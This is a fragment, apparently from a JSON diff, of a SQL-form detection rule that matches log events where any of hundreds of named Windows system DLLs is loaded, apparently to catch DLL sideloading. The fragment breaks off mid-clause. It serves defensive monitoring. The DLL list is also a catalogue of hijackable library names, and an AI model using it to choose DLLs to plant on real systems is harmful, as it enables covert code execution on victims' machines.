"rule": [ - "SELECT * FROM logs WHERE ((ImageLoaded LIKE '%\\\\shfolder.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\activeds.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\adsldpc.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\aepic.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\apphelp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\applicationframe.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\appxalluserstore.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\appxdeploymentclient.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\archiveint.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\atl.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\audioses.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\auditpolcore.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\authfwcfg.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\authz.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\avrt.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\bcd.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\bcp47langs.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\bcp47mrm.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\bcrypt.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\cabinet.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\cabview.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\certenroll.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\cldapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\clipc.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\clusapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\cmpbk32.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\coloradapterclient.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\colorui.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\comdlg32.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\connect.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\coremessaging.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\credui.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\cryptbase.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\cryptdll.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\cryptui.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\cryptxml.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\cscapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\cscobj.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\cscui.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\d2d1.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\d3d10.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\d3d10\\_1.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\d3d10\\_1core.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\d3d10core.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\d3d10warp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\d3d11.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\d3d12.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\d3d9.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dataexchange.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\davclnt.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dcomp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\defragproxy.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\desktopshellext.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\deviceassociation.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\devicecredential.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\devicepairing.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\devobj.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\devrtl.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dhcpcmonitor.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dhcpcsvc.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dhcpcsvc6.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\directmanipulation.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dismapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dismcore.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dmcfgutils.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dmcmnutils.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dmenrollengine.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dmenterprisediagnostics.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dmiso8601utils.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dmoleaututils.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dmprocessxmlfiltered.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dmpushproxy.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dmxmlhelputils.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dnsapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dot3api.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dot3cfg.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\drprov.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dsclient.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dsparse.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dsreg.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dsrole.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dui70.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\duser.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dusmapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dwmapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dwrite.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dxgi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dxva2.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\eappcfg.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\eappprxy.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\edputil.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\efsadu.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\efsutil.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\esent.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\execmodelproxy.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\explorerframe.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\fastprox.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\faultrep.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\fddevquery.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\feclient.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\fhcfg.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\firewallapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\flightsettings.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\fltlib.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\fveapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\fwbase.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\fwcfg.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\fwpolicyiomgr.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\fwpuclnt.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\getuname.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\hid.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\hnetmon.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\httpapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\idstore.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ieadvpack.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\iedkcs32.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\iertutil.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ifmon.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\iphlpapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\iri.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\iscsidsc.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\iscsium.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\isv.exe\\_rsaenh.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\joinutil.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ksuser.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ktmw32.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\licensemanagerapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\licensingdiagspp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\linkinfo.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\loadperf.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\logoncli.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\logoncontroller.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\lpksetupproxyserv.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\magnification.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mapistub.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mfcore.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mfplat.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\midimap.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\miutils.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mlang.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mmdevapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mobilenetworking.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mpr.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mprapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mrmcorer.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\msacm32.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mscms.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mscoree.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\msctf.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\msctfmonitor.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\msdrm.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\msftedit.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\msi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\msutb.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mswb7.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mswsock.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\msxml3.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mtxclu.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\napinsp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ncrypt.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ndfapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\netid.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\netiohlp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\netplwiz.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\netprofm.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\netsetupapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\netshell.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\netutils.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\networkexplorer.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\newdev.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ninput.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\nlaapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\nlansp\\_c.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\npmproxy.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\nshhttp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\nshipsec.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\nshwfp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ntdsapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ntlanman.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ntlmshared.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ntmarta.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ntshrui.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\oleacc.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\omadmapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\onex.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\osbaseln.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\osuninst.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\p2p.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\p2pnetsh.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\p9np.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\pcaui.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\pdh.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\peerdistsh.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\pla.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\pnrpnsp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\policymanager.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\polstore.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\printui.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\propsys.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\prvdmofcomp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\puiapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\radcui.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\rasapi32.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\rasgcw.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\rasman.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\rasmontr.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\reagent.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\regapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\resutils.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\rmclient.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\rpcnsh.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\rsaenh.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\rtutils.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\rtworkq.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\samcli.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\samlib.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\sapi\\_onecore.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\sas.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\scansetting.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\scecli.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\schedcli.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\secur32.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\shell32.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\slc.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\snmpapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\spp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\sppc.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\srclient.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\srpapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\srvcli.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ssp.exe\\_rsaenh.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ssp\\_isv.exe\\_rsaenh.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\sspicli.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ssshim.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\staterepository.core.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\structuredquery.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\sxshared.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\tapi32.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\tbs.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\tdh.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\tquery.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\tsworkspace.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ttdrecord.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\twext.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\twinapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\twinui.appcore.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\uianimation.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\uiautomationcore.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\uireng.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\uiribbon.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\updatepolicy.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\userenv.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\utildll.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\uxinit.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\uxtheme.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\vaultcli.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\virtdisk.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\vssapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\vsstrace.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wbemprox.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wbemsvc.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wcmapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wcnnetsh.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wdi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wdscore.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\webservices.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wecapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wer.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wevtapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\whhelper.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wimgapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\winbrand.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\windows.storage.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\windows.storage.search.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\windowscodecs.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\windowscodecsext.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\windowsudk.shellcommon.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\winhttp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wininet.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\winipsec.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\winmde.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\winmm.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\winnsi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\winrnr.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\winsqlite3.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\winsta.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wkscli.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wlanapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wlancfg.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wldp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wlidprov.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wmiclnt.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wmidcom.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wmiutils.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wmsgapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wofutil.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wpdshext.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wshbth.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wshelper.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wtsapi32.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wwapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\xmllite.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\xolehlp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\xwizards.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\xwtpw32.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\aclui.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\bderepair.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\bootmenuux.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dcntel.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dwmcore.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dynamoapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\fhsvcctl.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\fxsst.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\inproclogger.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\iumbase.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\kdstub.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\maintenanceui.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mdmdiagnostics.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mintdh.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\msdtctm.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\nettrace.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\osksupport.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\reseteng.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\resetengine.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\spectrumsyncclient.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\srcore.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\systemsettingsthresholdadminflowui.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\timesync.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\upshared.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wmpdui.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wwancfg.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dpx.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\fxsapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\fxstiff.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\xpsservices.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\appvpolicy.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\batmeter.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\bootux.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\cmutil.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\configmanager2.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\coredplus.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\coreuicomponents.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\cryptsp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dmcommandlineutils.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\drvstore.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dsprop.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dxcore.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\edgeiso.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\framedynos.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\fveskybackup.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\fvewiz.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\gpapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\icmp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ifsutil.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\iumsdk.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\lockhostingframework.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\lrwizdll.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mbaexmlparser.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mfc42u.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\msiso.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\msvcp110\\_win.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\netapi32.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\netjoin.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\netprovfw.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\opcservices.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\pkeyhelper.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\playsndsrv.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\powrprof.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\prntvpt.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\profapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\proximitycommon.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\proximityservicepal.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\rasdlg.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\security.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\sppcext.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\srmtrace.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\tpmcoreprovisioning.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\umpdc.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\unattend.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\urlmon.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\vdsutil.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\version.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\winbio.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\windows.ui.immersive.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\winscard.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\winsync.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wscapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wsmsvc.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\FxsCompose.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\WfsR.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\rpchttp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\storageusage.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\amsi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\PrintIsolationProxy.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\msdtcVSp1res.dll' ESCAPE '\\' OR ImageLoaded 